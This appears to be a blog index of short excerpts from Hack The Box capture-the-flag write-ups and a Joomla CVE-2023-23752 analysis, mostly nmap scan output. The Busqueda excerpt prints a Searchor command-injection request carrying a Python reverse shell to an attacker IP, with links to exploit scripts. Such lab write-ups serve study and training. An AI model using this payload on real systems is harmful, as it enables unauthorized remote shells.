Crafty

February 15, 2024 - 4 mins read

author: sysevil OS: Windows Difficult: Easy ip: 10.10.11.249 Port Scan nmap -p- -T4 --min-rate=10000 10.10.11.249 -oG open_ports_full Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-15 13:34 -03 Nmap scan report for 10.10.11.249 (10.10.11.249) Host is up (0.13s latency). Not shown: 65533 filtered tcp ports (no-response) PORT STATE SERVICE 80/tcp open http 25565/tcp open minecraft Nmap done: 1 IP address (1 host up) scanned in 13.58 seconds nmap -sV -sC -A -p 80,25565 -T4 --min-rate=1000 10.

Analysis of Joomla CVE-2023-23752

February 15, 2024 - 4 mins read

The Proof of Concept (PoC) for CVE-2023-23752 is available here. Overview CVE-2023-23752 represents a vulnerability in Joomla’s microservice API service, disclosed on February 13, 2023. Discovered by Zewei Zhang from NSFOCUS TIANJI Lab, the vulnerability has been assigned a base score of 5.3 (Medium). It allows unauthorized disclosure of plaintext passwords and Personally Identifiable Information (PII) of users. This article provides an analysis of the vulnerability. The Vulnerability CVE-2023-23752 is characterized by an improper access control flaw that permits unauthorized access to webservice endpoints without authentication.

Twomillion

February 15, 2024 - 5 mins read

author: sysevil OS: Linux Difficult: Easy Port Scanner sudo nmap -p- -v -oG fullscan -T4 10.10.11.221 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-14 18:19 -03 Initiating Ping Scan at 18:19 Scanning 10.10.11.221 [4 ports] Completed Ping Scan at 18:19, 0.15s elapsed (1 total hosts) Initiating SYN Stealth Scan at 18:19 Scanning 2million.htb (10.10.11.221) [65535 ports] Discovered open port 80/tcp on 10.10.11.221 Discovered open port 22/tcp on 10.10.11.221 SYN Stealth Scan Timing: About 22.

Devvortex

February 14, 2024 - 3 mins read

#joomla IP: 10.10.11.242 OS: Linux PortScanner nmap --min-rate 1000 -sV -sC -p- -oG fullscan 10.10.11.242 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-06 09:41 -03 Nmap scan report for 10.10.11.242 (10.10.11.242) Host is up (0.21s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA) | 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA) |_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519) 80/tcp open http nginx 1.

Busqueda

February 14, 2024 - 2 mins read

#searcho Os: Linux | Easy ip: 10.10.11.208 Web: - Werkzeug/2.1.2 Python/3.10.6 - Flask Python - Framework ? Searchor 2.4.0 Exploits: - https://raw.githubusercontent.com/nikn0laty/Exploit-for-Searchor-2.4.0-Arbitrary-CMD-Injection/main/exploit.sh ( searchor 2.4.0) - Exploit: https://github.com/jonnyzar/POC-Searchor-2.4.2 Reverse shell with searcho-exploit Exploit payload request: POST /search HTTP/1.1 Host: searcher.htb User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 283 Origin: http://searcher.htb Connection: close Referer: http://searcher.htb/search Upgrade-Insecure-Requests: 1 engine=Amazon&query='%20,%20exec("import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.10.14.11',80));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call(['/bin/sh','-i']);"))#&auto_redirect=10.10.14.11 Attacker machine Upgrade shell to TTY shell python3 -c 'import pty; pty.

Builder

February 14, 2024 - 5 mins read

IP: 10.10.11.10 OS: Linux Difficult: medium Port Scanner sudo nmap --min-rate 1000 -p- -T4 -sV 10.10.11.10 -oG full_scan [sudo] password for parallels: Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-12 20:17 -03 Nmap scan report for 10.10.11.10 (10.10.11.10) Host is up (0.13s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0) 8080/tcp open http Jetty 10.

Bizness

February 14, 2024 - 3 mins read

#obfiz IP: 10.10.11.252 Port Scan sudo nmap --min-rate 1000 -p- -T4 -sV 10.10.11.252 -oG full_scan [sudo] password for parallels: Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-05 18:25 -03 Warning: 10.10.11.252 giving up on port because retransmission cap hit (6). Nmap scan report for 10.10.11.252 (10.10.11.252) Host is up (0.13s latency). Not shown: 65290 closed tcp ports (reset), 241 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.

Steamcloud

February 14, 2024 - 2 mins read

Machine: Linux Difficult: Easy #Kubernetes #cloud IP: 10.10.14.149 PortScanner Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-14 08:33 -03 Nmap scan report for 10.10.11.133 (10.10.11.133) Host is up (0.13s latency). Not shown: 65529 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) 2379/tcp open ssl/etcd-client? 2380/tcp open ssl/etcd-server? 8443/tcp open ssl/https-alt 10249/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API) 10250/tcp open ssl/http Golang net/http server (Go-IPFS json-rpc or InfluxDB API) DirScanner _|.